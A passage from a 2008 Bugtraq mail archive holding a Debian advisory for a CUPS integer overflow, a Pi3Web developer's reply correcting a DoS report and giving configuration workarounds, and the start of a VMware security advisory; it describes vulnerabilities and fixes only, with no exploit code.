by mx.securityspace.com (Postfix) with ESMTP id B7E07EC112
for <lists@securityspace.com>; Tue,  2 Dec 2008 16:48:15 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E954D237098; Tue,  2 Dec 2008 14:30:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8190 invoked from network); 2 Dec 2008 21:01:29 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <joey@infodrom.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
From: joey@infodrom.org (Martin Schulze)
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
User-Agent: dsa-launch $Revision: 1.18 $
Message-Id: <20081202210910.50C4D2B3E1B@finlandia.home.infodrom.org>
Date: Tue,  2 Dec 2008 22:09:10 +0100 (CET)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1677-1] New CUPS packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <RXv4qxwULqD.A.8RD.hXaNJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue,  2 Dec 2008 21:17:21 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1677-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
December 2nd, 2008                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : cupsys
Vulnerability  : integer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2008-5286
Debian Bug     : 507183

An integer overflow has been discovered in the image validation code
of cupsys, the Common UNIX Printing System.  An attacker could trigger
this bug by supplying a malicious graphic that could lead to the
execution of arbitrary code.

For the stable distribution (etch) this problem has been fixed in
version 1.2.7-4etch6.

For testing distribution (lenny) this issue will be fixed soon.

For the unstable distribution (sid) this problem has been fixed in
version 1.3.8-1lenny4.

We recommend that you upgrade your cupsys packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6.dsc
      Size/MD5 checksum:     1092 a7198b7e0d7724a972d4027e805b1387
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6.diff.gz
      Size/MD5 checksum:   108940 1321ea49cfa8c06d619759acb00b0b2e
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz
      Size/MD5 checksum:  4214272 c9ba33356e5bb93efbcf77b6e142e498

  Architecture independent components:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch6_all.deb
      Size/MD5 checksum:   917900 4abe699f9d2a8f866b1e323934c6172a
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch6_all.deb
      Size/MD5 checksum:    46256 9e98540d35e8a7aef76a1042cc4befe4

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:  1614646 18542415a7a35563aacf6baccc2c474c
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:    39316 641f1871ea3d1e61a56dc009b2e58652
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:    85894 99a322067e2207a67afc55dccd5d63b4
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:  1092462 e2c0dd66dc9d52d41b7e179fa83908ab
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:    95658 51c76b87321a3c01dfe996fabad2de88
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:    72682 751a0c814ae40bf75b0494dafd19bd8e
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:   175346 f8701aeb6bc3670c3f1e60cc80c4ded7
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_alpha.deb
      Size/MD5 checksum:   183712 42dc520b09c22f1d25b7ff1e6d7574bb

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:  1576182 fe94635e099af684c654fb6468522f21
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:    36342 3e5954fdc1c572e86f2eeef93c1f466f
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:    80704 9a21d4104655094da5f2ff3a4c019a08
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:  1087506 cd83b8b030a4c972b1b3fa396114d9e9
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:    86360 aeed41809da68dc26e7c586e87878c45
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:    53008 9f8e3453367ef72e6ef6f00dc6baf624
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:   162608 a768dc52659411be6fd46b38df61d69b
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_amd64.deb
      Size/MD5 checksum:   142546 a6caf31df81c4aea72c0abc9c0a0b1af

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:  1569702 f7cd63fd8d10e8fcaea2649260b8437a
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:    35934 e5a3e25422b8ded68767d8c32d9291f5
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:    78916 f9707c6c35f2c3198892a8d82eecfa8b
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:  1026248 79e9a9669d9d896d303e29ed7d2b7122
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:    85540 45e25e1887e37f029a3a8da50b309fe4
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:    48732 b90d30685f1e68a036a512cf331547e6
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:   155278 1a0b8b93532c23d26866afc163689dd6
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_arm.deb
      Size/MD5 checksum:   132032 5c4843fe297598ee3c618f92feaef93e

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:  1624116 e285d90e7861906f00f8e709cb3039ae
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:    39544 d3015a7ef0c7c345d3940a6c9f428cf0
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:    84804 a4fa9da96d848e7596d6e3d623fdef07
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:  1032854 ec6badd9fcff41974f425d97a0a12165
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:    92038 3dcbb10b949495e21fc742b9b42a3a84
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:    57376 e64d3d7a95c80c92602e3e7548998bc2
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:   171856 ab864167ddd2c8b4247898ed36059435
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_hppa.deb
      Size/MD5 checksum:   153942 4149487b7dfd72b027de9851a4adb32e

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:  1556170 c0cefa71d7f58abd666c2c1459d3ede9
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:    36250 e464d81d46968426796a8182e6418691
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:    79702 77c4aef7c78be537c09bc689ad1f5139
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:   997624 ec73926b9d49c2790c6381a927ad20a2
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:    87310 86517be38ba93afd954091ad5643c65b
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:    53240 4fccf1dfd78b230033407a914760d3f5
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:   161274 41344ee4c268c095b89c8decc0e2df68
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_i386.deb
      Size/MD5 checksum:   137796 51b8758e0338e1ec6ec9d74ea5f960ef

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:  1771030 d4235a8ee49af176f27c8a097a696864
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:    46326 729ebfb9347d0463f7a6f5cc10c371e7
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:   106218 9a9142746bbca2c53644c084b45fea9c
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:  1108324 ea4f9d4d44e6b964c3793fd3a2862671
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:   107068 bab641470a0bf7034b9ebc7ae072d6fa
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:    74214 770441377ccf9ad422da6e9d3ba612eb
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:   204316 7df30a0f5661ea79cdcc537d4012b217
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_ia64.deb
      Size/MD5 checksum:   192364 41d3bab218b036299f8ffae98a9008de

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:  1567974 ba75b6ff260e84dd64b939cae9262a54
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:    36112 6cae983101bdd812ff1f6f26169ab06a
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:    76146 16b61a899c465fc7f142d97744dffba3
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:  1098272 daa46352b0ad47b5c3061c42a15e6ddb
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:    86920 dd75cd6ce9bd9ceaae7d39b60fda49c9
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:    57690 32cfeb2301ded386cf4ab6d0127f30a3
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:   158092 9abd9b0ce1dc1528b0ca50b5fbb7b78b
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_mips.deb
      Size/MD5 checksum:   150986 149531690113d5333beaf1622f915037

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:  1553596 a42820cf5bd8d46c4a5cab2a6bd0929a
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:    36076 f7239a53b24df0813b16aac1efc850b7
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:    77462 a60a8f2d6ab7958026585952890fc751
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:  1085502 a18f21c9c0eff69d326bf42596d3ed32
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:    87080 1b5618e9841ec899e63ee14cb36116d1
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:    57848 def6826bc2876abfcf1b9ad01eea3546
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:   158634 bc4151665423bb6acc3225d1f8017b50
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_mipsel.deb
      Size/MD5 checksum:   150888 f27527d8e7d3b892f5e2dc7aa0776434

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:  1576684 9c91771aea9ad144c56967ac8caf1fd5
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:    41290 69d7ba1506a7415dc74621aa833edf59
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:    89994 12245002a3f5e437921979cd8362d346
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:  1143404 c79dd5b219961ded9d9dfebf2361fed0
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:    88542 988f4b258fbdf870d51aacd1dd26b116
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:    51880 650b5a80af7485308b6fca8a0453c9c0
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:   163284 4fc43ad526d97ad3823524988c892851
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_powerpc.deb
      Size/MD5 checksum:   136868 2e1cdfaf184170342520895e26ee84b1

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:  1587456 5522fd1afaaa1105a51c91354783fd6f
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:    37422 38b8fd3823381f4384f8758139f3d418
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:    82336 55c8f39b3d04e0a127426f2daf89941f
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:  1037274 02149d41988647e7f4de8e626801c588
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:    88040 8c844af7aeb9c0e1ec9a093a537d5f91
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:    52508 c3695c0157c8bba7eb2bc614173bcd0f
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:   166802 1893c39f92d371c7b474d57f4d8c105e
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_s390.deb
      Size/MD5 checksum:   144928 0eb6cdbc1deceb32bbf2c145a99f7d98

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:  1562538 0757006ce0c52845673d2cbe9fae0b38
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:    36020 27636d7df41cfef4c9e41ee236a9b308
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:    78518 174e3b09d2d667e01d0b47ecb06a2925
    http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:   992164 79a9729f9280b70aa7e8573636cfeb8c
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:    85368 4c3b851a551b47fed4229f55b8a0a4fe
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:    51756 d4406a58edf127974a79b0df75eab757
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:   159176 29057219279ea090cf47b35b1da416af
    http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_sparc.deb
      Size/MD5 checksum:   139560 ca580a13d486d24f74c9a230efee6bde


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJNaPhW5ql+IAeqTIRAiX7AJwJd3Szo5tvpYyBrqggsDuPSulvKACfVJsa
EwALyW+6s+Lgp2d1GI2ong4=R0SH
-----END PGP SIGNATURE-----

From - Wed Dec  3 10:57:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004cf1
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38809-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 1A51EEDAB9
for <lists@securityspace.com>; Wed,  3 Dec 2008 10:54:50 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 582FD14392C; Wed,  3 Dec 2008 07:46:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20299 invoked from network); 3 Dec 2008 07:44:28 -0000
Date: Wed, 3 Dec 2008 00:48:44 -0700
Message-Id: <200812030748.mB37miTE012635@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: zimpel@t-online.de
To: bugtraq@securityfocus.com
Subject: Re: Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability
Status:   

I could finally reproduce the problem, when I used the Pi3Web 2.0.3 release without any patches. After applying the available patches in the intended incremental) order to this installation, with Pi3Web 2.0.3 PL2 the issue disappeared. 
 
It seems the creator of the original report has not used a properly maintained Pi3Web 2.03 with PL2 applied. The required patch PL2 is publically available since April 2007. 
 
FINAL RESULT 
 
No vulnerability: 
- with a properly maintained Pi3Web version 2.0.3 with incremental patches up to PL2 applied 
- OR - when Pi3Web is installed as a Windows service 
- OR - when configuration template Pi3Web/Conf/Intenet.pi3 is used 
 
Vulnerability (remote DoS in the reported way) confirmed: 
- Pi3Web version 2.0.3 without any available patches installed 
- AND - Pi3Web is installed as a desktop application 
- AND - configuration template Pi3Web/Conf/Intenet.pi3 is not used 
 
Normally all of the three topics have to be considered, when the server is installed as an remotely accessible (internet) server. 
 
Older versions may be vulnerable under the same condition (installation as a desktop application) but a number of indpendent solutions are available: 
 
- use configuration template internet.pi3 as basis to setup own internet servers 
- delete the ISAPI (and other!) examples manually 
- apply one (and only one) of the following configuration changes: 
 
1.) supplement the mapping directive for ISAPI: 
Mapping Condition="&or(&regexp('*.dll*',$U),&regexp('*.dll',$f))" ISAPIMapper From="/isapi/" To="Isapi\" 
 
2.) add to the ISAPI handler object: 
CheckPath Condition="&not(&and(&regexp('*.dll*',$U),&regexp('*.dll',$f)))" StatusCode StatusCode="404" 
 
PROPOSED ACTIONS FOR END USERS
Please check the Pi3Web server 2.0.3 installation to ensure, that all available patches have been applied. All updates and patches for release Pi3Web 2.0.3 can be downloaded here: 
 
https://sourceforge.net/project/showfiles.php?group_id753&package_id751&release_id%7565 
 
For people, who use the web site http://www.pi3.org (and not the project web site at sourceforge) I added a hint/link in the download area to look for recent updates and patches at sourceforge. 
 
Users of older versions should either update to Pi3Web 2.0.3 (including PL2) or apply the proposed configuration change or delete the ISAPI examples completely from the ISAPI folder. 

PROPOSED ACTIONS FOR BID 32287:
The current description in the BID is inconsistent and wrong and therefore needs multiple updates:
- Pi3Web 2.0.3 PL2 is not vulnerable
- The issue is only valid for Windows versions of Pi3Web
- the following 3 conditions must all be fullfilled in order to produce the issue but are not mentioned at all:
  - Pi3Web version 2.0.3 is installed without any available patches
  - AND - Pi3Web is installed as a desktop application 
  - AND - configuration template Pi3Web/Conf/Intenet.pi3 is not used 

- The configuration workarounds I provided a few days ago are not mentionend at all. Instead it is stated in the BID: "Currently we are not aware of any vendor-supplied patches for this issue."

- one reference to my emails to bugtraq in the 'references' tab of the BID is double and therefore my previous mail to bugtraq is missing in the references list.
--  
 
kind regards, 
Holger Zimmermann 

From - Wed Dec  3 11:07:47 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004cf2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38803-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D0357ED6C8
for <lists@securityspace.com>; Wed,  3 Dec 2008 11:03:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6126A1437DA; Wed,  3 Dec 2008 07:43:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17697 invoked from network); 3 Dec 2008 05:07:57 -0000
Message-ID: <493617F1.5070403@vmware.com>
Date: Tue, 02 Dec 2008 21:24:01 -0800
From: VMware Security team <security@vmware.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: VMSA-2008-0019 VMware Hosted products and patches for ESX and ESXi
 resolve a critical security issue and update bzip2
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2008-0019
Synopsis:          VMware Hosted products and patches for ESX and ESXi
                   resolve a critical security issue and update bzip2
Issue date:        2008-12-02
Updated on:        2008-12-02 (initial release of advisory)
CVE numbers:       CVE-2008-4917 CVE-2008-1372
- -------------------------------------------------------------------------

1. Summary

   Updated VMware Hosted products and patches for ESX and ESXi resolve
   two security issues. The first is a critical memory corruption
   vulnerability in virtual device hardware. The second is an updated
   bzip2 package for the Service Console.

2. Relevant releases

   VMware Workstation 6.0.5 and earlier,
   VMware Workstation 5.5.8 and earlier,
   VMware Player 2.0.5 and earlier,
   VMware Player 1.0.8 and earlier,
   VMware Server 1.0.9 and earlier,

   VMware ESXi 3.5 without patch ESXe350-200811401-O-SG

   VMware ESX 3.5 without patches ESX350-200811406-SG and
                                  ESX350-200811401-SG

   VMware ESX 3.0.3 without patches ESX303-200811404-SG and
                                    ESX303-200811401-BG

   VMware ESX 3.0.2 without patches ESX-1006980 and ESX-1006982

   NOTE: Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08.
         Users should plan to upgrade to ESX 3.0.3 and preferably to
         the newest release available.

3. Problem Description

 a. Critical Memory corruption vulnerability

    A memory corruption condition may occur in the virtual machine
    hardware. A malicious request sent from the guest operating
    system to the virtual hardware may cause the virtual hardware to
    write to uncontrolled physical memory.

    VMware would like to thank Andrew Honig of the Department of
    Defense for reporting this issue.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4917 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  ================    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     any      not affected
    Workstation    6.0.x     any      6.5.0 build 118166 or later
    Workstation    5.x       any      5.5.9 build 126128 or later

    Player         2.5.x     any      not affected
    Player         2.0.x     any      2.5.0 build 118166 or later
    Player         1.x       any      1.0.9 build 126128 or later

    ACE            2.5.x     Windows  not affected
    ACE            2.0.x     Windows  2.5.0 build 118166 or later
    ACE            1.x       Windows  1.0.8 build 125922 or later

    Server         2.x       any      not affected
    Server         1.x       any      1.0.8 build 126538 or later

    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X upgrade to Fusion 2.0 or later

    ESXi           3.5       ESXi     ESXe350-200811401-O-SG

    ESX            3.5       ESX      ESX350-200811401-SG
    ESX            3.0.3     ESX      ESX303-200811401-BG
    ESX            3.0.2     ESX      ESX-1006980
    ESX            2.5.5     ESX      not affected

 b. Updated Service Console package bzip2

    bzip2 versions before 1.0.5 can crash if certain flaws in compressed
    data lead to reading beyond the end of a buffer.  This might cause
    an application linked to the libbz2 library to crash when
    decompressing malformed archives.

